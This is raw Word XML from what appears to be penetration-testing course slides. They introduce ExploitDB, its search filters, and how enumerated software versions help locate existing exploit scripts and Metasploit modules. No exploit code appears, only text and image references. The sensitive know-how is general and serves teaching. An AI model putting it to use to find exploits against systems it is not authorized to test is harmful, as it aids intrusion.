        <w:spacing w:after="327" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576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122CCB5D" wp14:editId="5B82633C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>10873740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2202180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18511" name="Picture 18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" name="Picture 1851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0" wp14:anchorId="3425D455" wp14:editId="2A4F8B0F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>10972800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2202180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18512" name="Picture 18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" name="Picture 1851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0" wp14:anchorId="4896918B" wp14:editId="535A6C31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11064240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2202180</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="38100" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="18510" name="Picture 18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" name="Picture 185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But not all of them are strictly Metasploit modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1D80D1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="183" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>As CTE, we need to be able to find previous exploits or vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E39249" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Wouldn't it be handy to have a database of well-docume</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>nted exploits?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6FFBD9" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="169"/>
        <w:ind w:left="298" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:t>Introduction to ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251D7B17" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="448" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>https://exploit-dbcom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintains up-to-date and current records of known vulnerabilities and attack scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707F13A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="209" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/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4EF586D1" wp14:editId="3C41D2CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11315700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5181600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7620" cy="15240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="19028" name="Picture 19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" name="Picture 1902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1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>The project is owned and maintained by Offensive Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BE300A" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Their website allows you to search by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4945ADC0" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Type (Denial of Service, remote or local exploit, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127687C" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="4" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Platform (Windows, Linux, Mobile, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE00655" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="60"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>Service Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405FC7F1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>"Tag" (code injection, buffer overflow, cross-site scripting, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358632F5" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15468" w:right="-1815"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4440B1E7" wp14:editId="00F5C3F0">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19093" name="Picture 190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" name="Picture 1909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A2A3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C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9200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="96" w:right="2175" w:bottom="192" w:left="1224" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B354BEA" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-480" w:right="-1368"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F6A7992" wp14:editId="62C6B665">
            <wp:extent cx="11369040" cy="6195060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340716" name="Picture 340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16" name="Picture 34071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36904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1DDD" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="3"/>
        <w:ind w:left="10" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is why enumeration is so important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BC5032" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="351" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The software name and versio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>n number acquired during enumeration will help with finding an old vulnerability or exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335D6EBF" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="285" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>You won't be crafting any zero-days.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C503CB2" wp14:editId="2D356A1B">
            <wp:extent cx="228600" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340719" name="Picture 3407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19" name="Picture 34071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7466" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="1857" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>But old, unpatched or misconfigured software is certainly prevalent today.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02742CD3" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="15228" w:right="-1320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753467F2" wp14:editId="76849C75">
            <wp:extent cx="1363980" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="30570" name="Picture 30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0" name="Picture 3057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3DDE" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Search whatever information you have on a target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A55BB" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="3" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>The version number helps narrow down results and potential exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D79683" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="6" w:right="-1320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587323EC" wp14:editId="5435F278">
            <wp:extent cx="11029950" cy="4057650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340721" name="Picture 340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21" name="Picture 34072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0299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068B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Some entries might just be explanations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F25CC01" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="-384" w:right="-1320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34A3C85A" wp14:editId="0A49E79C">
            <wp:extent cx="11277600" cy="5476875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340723" name="Picture 3407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23" name="Picture 34072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2776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FD1B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="363"/>
        <w:ind w:left="76" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50470704" wp14:editId="4FE4F8E6">
            <wp:extent cx="323850" cy="47625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="340726" name="Picture 340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26" name="Picture 34072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70"/>
        </w:rPr>
        <w:t>but most inclu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="70"/>
        </w:rPr>
        <w:t>de exploit code!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786DDE3B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="342" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both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1E2D5E3B" wp14:editId="4D84CCA2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-215264</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-204754</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5857875" cy="4972050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340728" name="Picture 340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28" name="Picture 34072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0" wp14:anchorId="7AAB3C76" wp14:editId="163B845D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>6757035</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2814670</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1019175" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43762" name="Picture 4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2" name="Picture 4376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0" wp14:anchorId="0451A341" wp14:editId="4AF0A252">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>8890635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3300445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="485775" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340730" name="Picture 340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30" name="Picture 34073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0" wp14:anchorId="0C8FF5FD" wp14:editId="09DCA85B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>7242810</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3309970</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="790575" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43742" name="Picture 43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2" name="Picture 4374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0"/>
        </w:rPr>
        <w:t>You won't always see Python used for exploit scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F36D14" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="419" w:line="216" w:lineRule="auto"/>
        <w:ind w:left="8931"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="0" wp14:anchorId="71335C6F" wp14:editId="5A6E0310">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11515725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5133975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="9525" cy="9525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="43972" name="Picture 43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2" name="Picture 4397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0" wp14:anchorId="497856A7" wp14:editId="28A11657">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>11353800</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5676900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="609600" cy="1047750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340732" name="Picture 3407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32" name="Picture 34073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0"/>
        </w:rPr>
        <w:t>But, because it is so ubiquitous and so powerful, it is common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC649D" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="848" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="1305" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>This script uses Python 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429CDEC2" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="57" w:after="2"/>
        <w:ind w:left="-9851" w:right="255" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>Your mileage may vary with these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A9EE8" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="45" w:after="289"/>
        <w:ind w:left="-9851" w:right="1965" w:hanging="10"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>exploit scripts..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EE95E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:right="330"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>They may not always work!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355BB91B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="91"/>
        <w:ind w:left="16" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="68"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>You may find Metasploit modules as well:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD90153" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="486" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/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0" wp14:anchorId="46E2E0FF" wp14:editId="08DE64DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4777740</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-205739</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6256020" cy="4892040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340734" name="Picture 3407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34" name="Picture 34073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0" wp14:anchorId="56D03E09" wp14:editId="0DE8D19D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1981200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2240280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="784860" cy="213360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51247" name="Picture 51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7" name="Picture 51247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0" wp14:anchorId="37BE2E8E" wp14:editId="160CD21C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1981200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2682240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1607820" cy="38100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="340736" name="Picture 340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36" name="Picture 340736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0" wp14:anchorId="04E52B75" wp14:editId="66C0CC37">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>350520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3977640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1051560" cy="220980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51267" name="Picture 51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7" name="Picture 51267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0" wp14:anchorId="0D675A56" wp14:editId="51014E7D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2400300</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4008120</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="853440" cy="190500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="51260" name="Picture 51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0" name="Picture 5126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0"/>
        </w:rPr>
        <w:t>As you know, Metasploit is written in Ruby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12148FB1" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="403" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>You can read the code to better understand how the module works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D9382B" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="36" w:after="3" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="394" w:right="-495" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>These are often more reliable than</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4C8C4E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:before="96" w:after="314"/>
        <w:ind w:left="2158" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="46"/>
        </w:rPr>
        <w:t>other scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF7F80" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="5" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="550" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>but sometimes you are not allowed to use Metasploit!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BB324E" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="007A5F0C">
      <w:pPr>
        <w:sectPr w:rsidR="007A5F0C">
          <w:headerReference w:type="even" r:id="rId47"/>
          <w:headerReference w:type="default" r:id="rId48"/>
          <w:footerReference w:type="even" r:id="rId49"/>
          <w:footerReference w:type="default" r:id="rId50"/>
          <w:headerReference w:type="first" r:id="rId51"/>
          <w:footerReference w:type="first" r:id="rId52"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="804" w:right="1680" w:bottom="165" w:left="1464" w:header="156" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F85CE40" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:spacing w:after="4"/>
        <w:ind w:left="31" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Multiple results and findings are not a bad thing!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B464703" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="322" w:line="265" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t>We've seen three different results for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="54"/>
        </w:rPr>
        <w:t xml:space="preserve"> one service and potential exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321F2F28" w14:textId="77777777" w:rsidR="007A5F0C" w:rsidRDefault="006F6D33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="208" w:line="264" w:lineRule="auto"/>
        <w:ind w:hanging="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="50"/>
        </w:rPr>
        <w:t>This helps us determine possible avenues for attacking a vulnerability.</w:t>
      </w:r>
    </w:p>
